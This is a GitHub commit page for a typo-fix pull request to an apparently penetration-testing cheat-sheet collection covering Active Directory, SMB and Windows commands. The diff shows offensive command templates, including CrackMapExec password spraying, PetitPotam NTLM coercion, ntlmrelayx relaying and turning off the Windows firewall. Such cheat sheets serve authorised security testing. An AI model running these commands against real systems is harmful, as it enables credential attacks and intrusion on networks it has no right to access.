Skip to content

Commit

Permalink
Merge pull request #55 from renoua/typo-fixes
Browse files Browse the repository at this point in the history
Typo fixes - thanks @renoua
  • Loading branch information
v1k1ngfr authored Jun 19, 2023
2 parents cc3657a + 58de0c1 commit 0cab6a6
Show file tree
Hide file tree
Showing 6 changed files with 11 additions and 23 deletions.
2 changes: 1 addition & 1 deletion arsenal/data/cheats/Active_directory/bloodhound.md
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@
https://neo4j.com/docs/

```bash
neo4j console start
neo4j start
```

## bloodhound start IHM
Expand Down
2 changes: 1 addition & 1 deletion arsenal/data/cheats/Active_directory/cme.md
Original file line number Diff line number Diff line change
Expand Up @@ -206,7 +206,7 @@ cme smb <dc-ip> -u <user.txt> -p <password.txt> --no-bruteforce --continue-on-su
## cme - password spray multiple test
#plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/BRUTEFORCE-SPRAY #tag/warning

(carrefull on lockout)
(careful on lockout)

```bash
cme smb <dc-ip> -u <user.txt> -p <password.txt> --continue-on-success
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -44,13 +44,6 @@ https://github.com/topotam/PetitPotam
PetitPotam.py -u <user> -p '<password>' -d <domain> <listener> <target>
```

## Coercer
#plateform/linux #target/remote #cat/ATTACK/EXPLOIT
https://github.com/p0dalirius/Coercer
```
PetitPotam.py -u <user> -p '<password>' -d <domain> -l <listener> -t <target-ip>
```

## ntlmrelayx add computer
#plateform/linux #target/remote #cat/ATTACK/MITM
```
Expand Down
4 changes: 2 additions & 2 deletions arsenal/data/cheats/Linux/misc.md
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@
echo <content> | curl -F-=\<- qrenco.de
```

## json
# json

% json

Expand All @@ -19,7 +19,7 @@ echo <content> | curl -F-=\<- qrenco.de
cat <json_file> | ruby -ryaml -rjson -e 'puts YAML.dump(JSON.load(ARGF))'
```

# linux
# linux

% misc, linux

Expand Down
2 changes: 1 addition & 1 deletion arsenal/data/cheats/Protocol/smb/enum4linux.md
Original file line number Diff line number Diff line change
Expand Up @@ -31,5 +31,5 @@ enum4linux -u <user> -p <password> <ip>

## enum4linux - list Users
```
enum4linux -U <ip> |grep 'users:'
enum4linux -U <ip> |grep 'user:'
```
17 changes: 6 additions & 11 deletions arsenal/data/cheats/Windows/windows.md
Original file line number Diff line number Diff line change
Expand Up @@ -94,7 +94,7 @@ wmic service list brief

## list services (3)
```
sc query #List of services
sc query
```

## list installed software (1)
Expand Down Expand Up @@ -230,7 +230,7 @@ whoami /all
## whoami privilegied
#cat/PRIVESC
```
whoami /priv #Show only privileges
whoami /priv
```

## list all users
Expand Down Expand Up @@ -285,11 +285,6 @@ net localgroup
net localgroup <group_name>
```

## show domain groups
```
net group /domain
```

## show domain group users
```
net group /domain <domain_group_name>
Expand Down Expand Up @@ -324,7 +319,7 @@ set logonserver #Get name of the domain controller

## list of domain groups
```
net groups /domain
net group /domain
```

## list of computer connected to the domain
Expand Down Expand Up @@ -384,7 +379,7 @@ net accounts /domain

## get mapping of the trust relationships
```
nltest /domain_trust
nltest /domain_trusts
```

% windows, network
Expand Down Expand Up @@ -438,7 +433,7 @@ netsh firewall show config

## turn off firewall
```
NetSh Advfirewall set allprofiles state off
netsh Advfirewall set allprofiles state off
```

## turn off firewall (2)
Expand All @@ -448,7 +443,7 @@ netsh firewall set opmode disable

## turn on firewall
```
NetSh Advfirewall set allprofiles state on
netsh Advfirewall set allprofiles state on
```

## firewall open port RDP
Expand Down

0 comments on commit 0cab6a6

Please sign in to comment.